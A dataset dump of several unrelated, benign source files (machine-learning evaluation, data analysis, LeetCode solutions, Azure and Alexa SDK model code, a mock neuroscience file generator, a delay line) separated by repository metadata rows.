model = KNeighborsClassifier()
# evaluate the model
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)
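# 10-fold cross-validation repeated 3 times yields 30 accuracy estimates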
n_scores = cross_val_score(model, X, y, scoring='accuracy', cv=cv, n_jobs=-1)
# report model performance
print('Accuracy: %.3f (%.3f)' % (mean(n_scores), std(n_scores))) | [
"[email protected]"
] | |
7bf358f112e3ef7aa77ff185a38d1f372ce35085 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/data_analyze.py | 1b53f51941b2a5bab76c5647d28bf9d31e0e44bf | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,937 | py | """
Data analysis
See the research report for the detailed research process.
"""
import json
import pandas as pd
import numpy as np
from decimal import Decimal
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
def save_as_file(data: dict, filename):
    with open(filename, 'w', encoding='utf-8') as json_file:
json.dump(data, json_file, ensure_ascii=False, indent=4)
def get_difficulty(data):
    d = []  # problem difficulty
    u = []  # upload rate
    li = []  # lines of code
    avg = []
    avg_all = []  # arithmetic mean of pass rates
num_of_cases = []
for types in data.items():
avg.append(types[1]["avg_pass_rate"])
        cor_pu = (types[1]["correlation_pu"])  # correlation between pass rate and upload rate
        cor_pl = (types[1]["correlation_pl"])  # correlation between pass rate and lines of code
        for cases in types[1].items():  # per category
if cases[0] == 'cases':
print(types[0], len(cases[1]))
num_of_cases.append([types[0], len(cases[1])])
for case in cases[1].items():
u.append(case[1]["up_rate"]*cor_pu)
li.append(case[1]["avg_lines"]*cor_pl)
                    d.append((1 - case[1]["pass_rate"]))  # 1 - pass rate of this problem
avg_all.append(case[1]["pass_rate"])
    # map each metric onto the interval [1, 5]
    d1 = map_to(1, 5, d)  # problem difficulty after mapping
u1 = map_to(1, 5, u)
li1 = map_to(1, 5, li)
final_d = []
for i in range(0, len(d1)):
        # correct the difficulty using upload count and lines of code
final_d.append(get_final_d(d1[i], u1[i], li1[i], 0.846, 0.084))
cnt_easy = 0
cnt_medium = 0
cnt_hard = 0
for di in final_d:
        if 1 <= di < 2.2:  # pass rate 70% and above: easy
            cnt_easy += 1
        elif 2.2 <= di < 3.4:  # pass rate 40%-70%: medium
            cnt_medium += 1
        else:  # pass rate below 40%: hard
            cnt_hard += 1
print("easy: ", cnt_easy, cnt_easy/882)
print("medium: ", cnt_medium, cnt_medium/882)
print("hard: ", cnt_hard, cnt_hard/882)
print("难度系数均值:", np.mean(final_d))
print("修正前通过率均值:", np.mean(avg_all))
print("修正后均值:", 1-np.mean(map_to(0, 1, final_d)))
print(avg)
return final_d
def get_final_d(k, m, n, alpha, beta):  # get the corrected difficulty coefficient
return alpha*k + beta*m + (1-alpha-beta)*n
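# Example (sketch): with alpha=0.846 and beta=0.084 (the weights used above),
# k=3.0, m=2.0, n=4.0 gives 0.846*3.0 + 0.084*2.0 + 0.070*4.0 = 2.986,
# which still falls in the "medium" band defined below.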
def get_diff_by_degree(degree):  # map a difficulty coefficient to a difficulty label
if 1 <= degree < 2.2:
return "easy"
elif 2.2 <= degree < 3.4:
return "medium"
else:
return "hard"
def geometric_mean(data):  # compute the geometric mean
total = 1
for i in data:
if i == 0:
continue
total *= Decimal(str(format(i, ".2f")))
# print(float(format(i, ".2f")))
return total ** Decimal(1.0/len(data))
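# Example (sketch): geometric_mean([1, 2, 4]) evaluates (1*2*4) ** (1/3), i.e. 2
# (up to Decimal precision). Note zeros are skipped in the product but still
# counted by len(data), which biases the result for inputs containing zeros.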
def map_to(start, end, data):  # map data onto the given interval [start, end]
    d_min = np.min(data)
    d_max = np.max(data)
res = []
for d in data:
res.append(start+(end-start)/(d_max-d_min)*(d-d_min))
return res
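# Example (sketch): map_to(1, 5, [0.0, 0.5, 1.0]) -> [1.0, 3.0, 5.0]. Constant
# input would make d_max == d_min and raise ZeroDivisionError.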
def get_result(data, final_d):
res = {}
i = 0
for types in data.items():
if types[0] not in res.keys():
res[types[0]] = {"cases": types[1]}
for cid, case in types[1].items():
res[types[0]]["cases"][cid] = case
res[types[0]]["cases"][cid]["degree"] = final_d[i]
res[types[0]]["cases"][cid]["difficulty"] = get_diff_by_degree(final_d[i])
i += 1
print(i)
return res
if __name__ == "__main__":
with open("../Data/final_data_v2.json", 'r', encoding="utf-8") as f:
_data = json.loads(f.read())
final_data = get_difficulty(_data)
with open("../Data/final_data.json", 'r', encoding="utf-8") as f:
_data = json.loads(f.read())
result = get_result(_data, final_data)
# save_as_file(result, "../Data/result.json")
| [
"[email protected]"
] | |
b5956f1a4f170c496cdc206d745f9cb2a1b5f2c9 | 10b74a5b6e678e51853611645f7898d2d28eccf8 | /player117.py | 50a13f63fd40e20f130faa5e2c303af0c1080256 | [] | no_license | tigervanilla/Guvi | a31ce1838707c71976a23fd5b25f5ebd9e0656ef | f9363f46f23d8a9b17a14f3d83322f59944a444b | refs/heads/master | 2020-04-01T02:44:43.767502 | 2019-04-18T04:58:40 | 2019-04-18T04:58:40 | 152,793,355 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | a=input()
a = a[::-1]  # reverse the string; the loop below joins its characters with '-'
print(a[0],end='')
for i in a[1:]:
print('-'+i,end='') | [
"[email protected]"
] | |
c380425895250438ccfe619d806e2cc74a449d63 | f63dc9959bbd596c04f70f671f9b0cbc70adb552 | /env/lib/python3.6/_bootlocale.py | 7d49875e50ddc0d5b5d4af50922354e7dda4ee93 | [] | no_license | paulfranco/imd_api | efa4e5d5399fea191f215d2a8d907adfb55ab31a | 1889290b5596fd1a020c336cc7c28d8521785a15 | refs/heads/master | 2020-03-16T06:30:31.077649 | 2018-05-09T02:10:03 | 2018-05-09T02:10:03 | 132,556,482 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 56 | py | /Users/paulfranco/anaconda3/lib/python3.6/_bootlocale.py | [
"[email protected]"
] | |
c7f5f003abb3040b1524784d99a06585be3ae3cc | 5afd733a5c1f753601c69b8b4eae1b49edfbae7c | /1-100/26.py | fa36e700d0e1f5ab060ef83dfb14183c587f6ef8 | [] | no_license | yanbinbi/leetcode | 9dcd4a0160be915006455b83d6b7cd39e9819811 | 616a868bfa7bdd00195067b0477b0236a72d23e0 | refs/heads/master | 2021-05-13T19:34:17.222576 | 2017-11-12T02:04:31 | 2017-11-12T02:04:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 391 | py | class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
size = len(nums)
if size == 0:
return 0
j = 0
for i in range(1,size):
if nums[i] > nums[j]:
j += 1
if i != j:
nums[j] = nums[i]
return j+1
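# Usage sketch (not part of the original solution):
#   nums = [1, 1, 2, 3, 3]
#   k = Solution().removeDuplicates(nums)  # k == 3 and nums[:3] == [1, 2, 3]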
| [
"[email protected]"
] | |
aa034bd935af2335c3c1651436ae7001c1fde500 | a4525c981552117dabdf5f952ced15997199da32 | /ask-smapi-model/ask_smapi_model/v1/skill/interaction_model/model_type/slot_type_definition_output.py | 5a60b84255908d1a8d2553d4ce4a24b9d61f9ea7 | [
"Apache-2.0"
] | permissive | muskanmahajan37/alexa-apis-for-python | 29b3b8e45bb009fa56ba0a2a73ed2f50efe77f65 | 8e0c90a3031f5afd8a2e62d19b51fe392e7da1af | refs/heads/master | 2022-11-09T01:14:58.947495 | 2020-06-25T17:33:19 | 2020-06-25T17:33:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,919 | py | # coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input import SlotTypeInputV1
class SlotTypeDefinitionOutput(object):
"""
Slot Type request definitions.
:param slot_type:
:type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput
:param total_versions: Total number of versions.
:type total_versions: (optional) str
"""
deserialized_types = {
'slot_type': 'ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput',
'total_versions': 'str'
} # type: Dict
attribute_map = {
'slot_type': 'slotType',
'total_versions': 'totalVersions'
} # type: Dict
supports_multiple_types = False
def __init__(self, slot_type=None, total_versions=None):
# type: (Optional[SlotTypeInputV1], Optional[str]) -> None
"""Slot Type request definitions.
:param slot_type:
:type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput
:param total_versions: Total number of versions.
:type total_versions: (optional) str
"""
self.__discriminator_value = None # type: str
self.slot_type = slot_type
self.total_versions = total_versions
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {} # type: Dict
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, SlotTypeDefinitionOutput):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
46b7f2b1be3242b3a9fd4117a6a4d2ec15eabc2a | 7cb646a87705156e9d6e0b651df4c0a90a99947b | /phy/io/mock/kwik.py | eed05ce223d2cfe13a1c77dd59cf3e8a4654db4d | [] | no_license | cgestes/phy | 1339b8ce46ac076129496745c23d87bfc73e6407 | 8bb7b9377e6376dce46ef123ccc97ecf3671fb15 | refs/heads/master | 2021-01-18T10:21:35.785483 | 2015-04-16T11:42:39 | 2015-04-16T13:51:57 | 30,656,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,009 | py | # -*- coding: utf-8 -*-
"""Mock Kwik files."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import os.path as op
import numpy as np
from ...io.mock.artificial import (artificial_spike_samples,
artificial_spike_clusters,
artificial_features,
artificial_masks,
artificial_traces)
from ...electrode.mea import staggered_positions
from ..h5 import open_h5
from ..kwik_model import _kwik_filenames, _create_clustering
#------------------------------------------------------------------------------
# Mock Kwik file
#------------------------------------------------------------------------------
def create_mock_kwik(dir_path, n_clusters=None, n_spikes=None,
n_channels=None, n_features_per_channel=None,
n_samples_traces=None,
with_kwx=True, with_kwd=True):
"""Create a test kwik file."""
filename = op.join(dir_path, '_test.kwik')
filenames = _kwik_filenames(filename)
kwx_filename = filenames['kwx']
kwd_filename = filenames['raw.kwd']
# Create the kwik file.
with open_h5(filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
def _write_metadata(key, value):
f.write_attr('/application_data/spikedetekt', key, value)
_write_metadata('sample_rate', 20000.)
# Filter parameters.
_write_metadata('filter_low', 500.)
_write_metadata('filter_high', 0.95 * .5 * 20000.)
_write_metadata('filter_butter_order', 3)
_write_metadata('extract_s_before', 15)
_write_metadata('extract_s_after', 25)
_write_metadata('nfeatures_per_channel', n_features_per_channel)
# Create spike times.
spike_samples = artificial_spike_samples(n_spikes).astype(np.int64)
spike_recordings = np.zeros(n_spikes, dtype=np.uint16)
# Size of the first recording.
recording_size = 2 * n_spikes // 3
# Find the recording offset.
recording_offset = spike_samples[recording_size]
recording_offset += spike_samples[recording_size + 1]
recording_offset //= 2
spike_recordings[recording_size:] = 1
# Make sure the spike samples of the second recording start over.
spike_samples[recording_size:] -= spike_samples[recording_size]
spike_samples[recording_size:] += 10
if spike_samples.max() >= n_samples_traces:
raise ValueError("There are too many spikes: decrease 'n_spikes'.")
f.write('/channel_groups/1/spikes/time_samples', spike_samples)
f.write('/channel_groups/1/spikes/recording', spike_recordings)
f.write_attr('/channel_groups/1',
'channel_order',
np.arange(1, n_channels - 1)[::-1],
)
# Create channels.
positions = staggered_positions(n_channels)
for channel in range(n_channels):
group = '/channel_groups/1/channels/{0:d}'.format(channel)
f.write_attr(group, 'name', str(channel))
f.write_attr(group, 'position', positions[channel])
# Create spike clusters.
clusterings = [('main', n_clusters),
('automatic', n_clusters * 2),
]
for clustering, n_clusters_rec in clusterings:
spike_clusters = artificial_spike_clusters(n_spikes,
n_clusters_rec)
_create_clustering(f, clustering, 1, spike_clusters)
# Create recordings.
f.write_attr('/recordings/0', 'name', 'recording_0')
f.write_attr('/recordings/1', 'name', 'recording_1')
# Create the kwx file.
if with_kwx:
with open_h5(kwx_filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
features = artificial_features(n_spikes,
(n_channels - 2) *
n_features_per_channel)
masks = artificial_masks(n_spikes,
(n_channels - 2) *
n_features_per_channel)
fm = np.dstack((features, masks)).astype(np.float32)
f.write('/channel_groups/1/features_masks', fm)
# Create the raw kwd file.
if with_kwd:
with open_h5(kwd_filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
traces = artificial_traces(n_samples_traces, n_channels)
# TODO: int16 traces
f.write('/recordings/0/data',
traces[:recording_offset, ...].astype(np.float32))
f.write('/recordings/1/data',
traces[recording_offset:, ...].astype(np.float32))
return filename
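# Usage sketch (parameter values are illustrative only; n_spikes must be small
# enough that every spike sample stays below n_samples_traces):
#   path = create_mock_kwik(tmpdir, n_clusters=5, n_spikes=50, n_channels=10,
#                           n_features_per_channel=3, n_samples_traces=5000)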
| [
"[email protected]"
] | |
c72670766922c59f54f1e38c3251a93c3d29440e | 8ed4bf9fbead471c9e5f88e4d18ac432ec3d628b | /hackerrank/algorithm/string/reduced_string.py | 0fec6e1adc81c9b8b46f35b176b59a2b2e96024b | [] | no_license | hizbul25/programming_problem | 9bf26e49ed5bb8c9c829d00e765c9401222fb35c | 2acca363704b993ffe5f6c2b00f81a4f4eca7204 | refs/heads/master | 2021-01-10T22:28:26.105787 | 2018-01-21T16:45:45 | 2018-01-21T16:45:45 | 65,394,734 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 270 | py | # URL: https://www.hackerrank.com/challenges/reduced-string
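# Example (sketch): "aaabccddd" reduces to "abd" -- "aa", "cc" and one "dd"
# cancel pairwise; the stack below keeps only the surviving characters.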
s = input()
stack = []
for i in range(len(s)):
if not stack or s[i] != stack[-1]:
stack += [s[i]]
else:
stack.pop()
if stack:
print(''.join(stack))
else:
print('Empty String') | [
"[email protected]"
] | |
c2f63be45f8a4ef6445fb0981f9ae21611bb6d46 | 82b946da326148a3c1c1f687f96c0da165bb2c15 | /sdk/python/pulumi_azure_native/web/v20181101/get_web_app_swift_virtual_network_connection_slot.py | 5279f9e04c7689c8359817ea2659e83821fa878c | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | morrell/pulumi-azure-native | 3916e978382366607f3df0a669f24cb16293ff5e | cd3ba4b9cb08c5e1df7674c1c71695b80e443f08 | refs/heads/master | 2023-06-20T19:37:05.414924 | 2021-07-19T20:57:53 | 2021-07-19T20:57:53 | 387,815,163 | 0 | 0 | Apache-2.0 | 2021-07-20T14:18:29 | 2021-07-20T14:18:28 | null | UTF-8 | Python | false | false | 5,220 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'GetWebAppSwiftVirtualNetworkConnectionSlotResult',
'AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult',
'get_web_app_swift_virtual_network_connection_slot',
]
@pulumi.output_type
class GetWebAppSwiftVirtualNetworkConnectionSlotResult:
"""
Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration.
"""
def __init__(__self__, id=None, kind=None, name=None, subnet_resource_id=None, swift_supported=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if subnet_resource_id and not isinstance(subnet_resource_id, str):
raise TypeError("Expected argument 'subnet_resource_id' to be a str")
pulumi.set(__self__, "subnet_resource_id", subnet_resource_id)
if swift_supported and not isinstance(swift_supported, bool):
raise TypeError("Expected argument 'swift_supported' to be a bool")
pulumi.set(__self__, "swift_supported", swift_supported)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="subnetResourceId")
def subnet_resource_id(self) -> Optional[str]:
"""
The Virtual Network subnet's resource ID. This is the subnet that this Web App will join. This subnet must have a delegation to Microsoft.Web/serverFarms defined first.
"""
return pulumi.get(self, "subnet_resource_id")
@property
@pulumi.getter(name="swiftSupported")
def swift_supported(self) -> Optional[bool]:
"""
A flag that specifies if the scale unit this Web App is on supports Swift integration.
"""
return pulumi.get(self, "swift_supported")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(GetWebAppSwiftVirtualNetworkConnectionSlotResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebAppSwiftVirtualNetworkConnectionSlotResult(
id=self.id,
kind=self.kind,
name=self.name,
subnet_resource_id=self.subnet_resource_id,
swift_supported=self.swift_supported,
type=self.type)
def get_web_app_swift_virtual_network_connection_slot(name: Optional[str] = None,
resource_group_name: Optional[str] = None,
slot: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult:
"""
Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration.
:param str name: Name of the app.
:param str resource_group_name: Name of the resource group to which the resource belongs.
:param str slot: Name of the deployment slot. If a slot is not specified, the API will get a gateway for the production slot's Virtual Network.
"""
__args__ = dict()
__args__['name'] = name
__args__['resourceGroupName'] = resource_group_name
__args__['slot'] = slot
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:web/v20181101:getWebAppSwiftVirtualNetworkConnectionSlot', __args__, opts=opts, typ=GetWebAppSwiftVirtualNetworkConnectionSlotResult).value
return AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(
id=__ret__.id,
kind=__ret__.kind,
name=__ret__.name,
subnet_resource_id=__ret__.subnet_resource_id,
swift_supported=__ret__.swift_supported,
type=__ret__.type)
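# Usage sketch (resource names below are placeholders, not from this module):
#   conn = get_web_app_swift_virtual_network_connection_slot(
#       name="my-app", resource_group_name="my-rg", slot="staging")
#   subnet_id = conn.subnet_resource_id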
| [
"[email protected]"
] | |
e2daa17da7418fb80cec9ab0745d804c304546ab | fee71dd79c16f8e4aa4be46aa25863a3e8539a51 | /ear/core/delay.py | 58999508e96ec84140b7be0b2066bb0c4deb9373 | [
"BSD-3-Clause-Clear"
] | permissive | ebu/ebu_adm_renderer | d004ed857b3004c9de336426f402654779a0eaf8 | ef2189021203101eab323e1eccdd2527b32a5024 | refs/heads/master | 2023-08-09T09:13:06.626698 | 2022-12-07T12:22:39 | 2022-12-07T12:22:39 | 123,921,945 | 61 | 13 | BSD-3-Clause-Clear | 2023-08-30T17:17:05 | 2018-03-05T13:15:36 | Python | UTF-8 | Python | false | false | 1,676 | py | import numpy as np
class Delay(object):
"""Multi-channel delay line.
Parameters:
nchannels (int): number of channels to process
delay (int): number of samples to delay by
"""
def __init__(self, nchannels, delay):
assert delay >= 0
self.delaymem = np.zeros((delay, nchannels))
self.delay = delay
def process(self, input_samples):
"""Push n samples through the delay line.
Parameters:
input_samples (array of nsamples by nchannels): input samples
Returns:
array of nsamples by nchannels: output samples, delayed by delay
samples.
"""
output = np.zeros_like(input_samples)
# transfer samples from the delay memory followed by the input, to the
# output followed by the new delay memory, such that concat(src) before
# the transfer has the same value as concat(dst) after
src = [self.delaymem, input_samples]
dst = [output, self.delaymem]
# copy the common part of src[0] and dst[0]
start_len = min(len(src[0]), len(dst[0]))
if start_len: dst[0][:start_len] = src[0][:start_len]
# copy the part where src[0] overlaps dst[1] or src[1] overlaps dst[0]
overlap = len(src[0]) - len(dst[0])
if overlap > 0: # src[0] longer
dst[1][:overlap] = src[0][-overlap:]
elif overlap < 0: # dst[0] longer
dst[0][overlap:] = src[1][:-overlap]
# copy the common part of src[1] and dst[1]
end_len = min(len(src[1]), len(dst[1]))
if end_len: dst[1][-end_len:] = src[1][-end_len:]
return output
| [
"[email protected]"
] | |
42803d5018e53b70b319b1d8fc3cfa2d380118f7 | b8d2f095a4b7ea567ccc61ee318ba879318eec3d | /数组 Array/228. 汇总区间.py | 2459ae5ea8ae5dd79af2263fa4cdbfdda2c61f89 | [] | no_license | f1amingo/leetcode-python | a3ef78727ae696fe2e94896258cfba1b7d58b1e3 | b365ba85036e51f7a9e018767914ef22314a6780 | refs/heads/master | 2021-11-10T16:19:27.603342 | 2021-09-17T03:12:59 | 2021-09-17T03:12:59 | 205,813,698 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 971 | py | from typing import List
class Solution:
def summaryRanges(self, nums: List[int]) -> List[str]:
if not nums:
return []
ans = []
lt, rt = nums[0], None
for i in range(len(nums) - 1):
if nums[i + 1] - nums[i] == 1:
                # note: "if t is None" and "if not t" are not equivalent
if lt is None:
lt = nums[i]
rt = nums[i + 1]
else:
                ans.append(str(lt) + '->' + str(rt) if rt is not None else str(lt))
lt, rt = nums[i + 1], None
        ans.append(str(lt) + '->' + str(rt) if rt is not None else str(lt))
return ans
assert Solution().summaryRanges([0]) == ['0']
assert Solution().summaryRanges([0, 1, 2, 4, 5, 7]) == ["0->2", "4->5", "7"]
assert Solution().summaryRanges([0, 2, 3, 4, 6, 8, 9]) == ["0", "2->4", "6", "8->9"]
assert Solution().summaryRanges([]) == []
assert Solution().summaryRanges([-1]) == ['-1']
| [
"[email protected]"
] | |
2ec9d717282626becf58a398a994ec197e90f564 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Kivy/python-for-android/pythonforandroid/recipes/ffpyplayer_codecs/__init__.py | 599d8d30207ce572fac347c18e6677d753b80e58 | [
"MIT"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:d196a4f300350342824820ae06ebac62968d8b22ad0fd350043b298a302af005
size 206
| [
"[email protected]"
] | |
235d72234d9d44c9e16f8a005e6726574387a789 | a689a72d3699883d7b58bd4ee3103373270bd0d5 | /BOJ/Python/BOJ17135.py | 5ecf7f7b4bd365d3f602a3d3ca99da2cd2830899 | [] | no_license | Oizys18/Algo | 4670748c850dc9472b6cfb9f828a3ccad9c18981 | 45caafe22a8a8c9134e4ff3b227f5f0be94eefe7 | refs/heads/master | 2022-05-11T08:35:06.812539 | 2022-05-07T01:30:41 | 2022-05-07T01:30:41 | 202,690,024 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,722 | py | # Castle Defense (BOJ 17135)
from pprint import pprint as pp
import collections
import itertools
import copy
N, M, D = map(int, input().split())
mat = [[*map(int, input().split())] for _ in range(N)] + [[0]*M]
archers = [0]*M
def isMap(x, y):
if 0 <= x < N + 2 and 0 <= y < M:
return True
else:
return False
def BFS(field, x, y):
visit = [[0]*M for _ in range(N+1)]
queue = []
queue.append((0, x, y))
while queue:
depth, x, y = queue.pop(0)
if depth > D:
continue
if not visit[x][y]:
visit[x][y] = 1
if field[x][y] == 1:
return (x, y)
for dx, dy in [(0, -1), (-1, 0), (0, 1)]:
nx = x + dx
ny = y + dy
if isMap(nx, ny):
queue.append((depth+1, nx, ny))
def fight():
kills = 0
field = collections.deque(copy.deepcopy(mat))
while True:
turnKill = set()
for x in range(N + 1):
for y in range(M):
if field[x][y] == 2:
killed = BFS(field, x, y)
if killed:
turnKill.add(killed)
for xt, yt in turnKill:
field[xt][yt] = 0
kills += 1
field.extendleft([[0]*M])
del field[N]
flag = 0
for a in range(N):
for b in range(M):
if field[a][b]:
flag = 1
if not flag:
return kills
res = 0
for chosen_archer in itertools.combinations(range(M), 3):
for ca in chosen_archer:
mat[N][ca] = 2
tactics = fight()
if res < tactics:
res = tactics
mat[N] = [0]*M
print(res)
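# Brute force: itertools.combinations tries every C(M, 3) archer placement and
# fight() fully simulates the battle for each one, keeping the best kill count.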
| [
"[email protected]"
] | |
6b6946656fd1304aae15c78dde3c42a745ede7da | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/ml/azure-ai-ml/azure/ai/ml/_restclient/v2021_10_01_dataplanepreview/operations/_model_versions_operations.py | 96a47546ef9a6da776ce57b212c87f20db9d6679 | [
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"PSF-2.0",
"LGPL-2.0-or-later",
"GPL-3.0-or-later",
"GPL-1.0-or-later",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"Python-2.0",
"MPL-2.0",
"LicenseRef-scancode-other-copyleft",
"HPND",
"ODbL-1.0",
"GPL-3.0-only",
"ZPL-2.1",
"MIT",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 37,349 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
map_error,
)
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar("T")
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
# fmt: off
def build_list_request(
name, # type: str
subscription_id, # type: str
resource_group_name, # type: str
registry_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = kwargs.pop('api_version', "2021-10-01-dataplanepreview") # type: str
skiptoken = kwargs.pop('skiptoken', None) # type: Optional[str]
order_by = kwargs.pop('order_by', None) # type: Optional[str]
top = kwargs.pop('top', None) # type: Optional[int]
version = kwargs.pop('version', None) # type: Optional[str]
description = kwargs.pop('description', None) # type: Optional[str]
tags = kwargs.pop('tags', None) # type: Optional[str]
properties = kwargs.pop('properties', None) # type: Optional[str]
list_view_type = kwargs.pop('list_view_type', None) # type: Optional[Union[str, "_models.ListViewType"]]
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.MachineLearningServices/registries/{registryName}/models/{name}/versions')
path_format_arguments = {
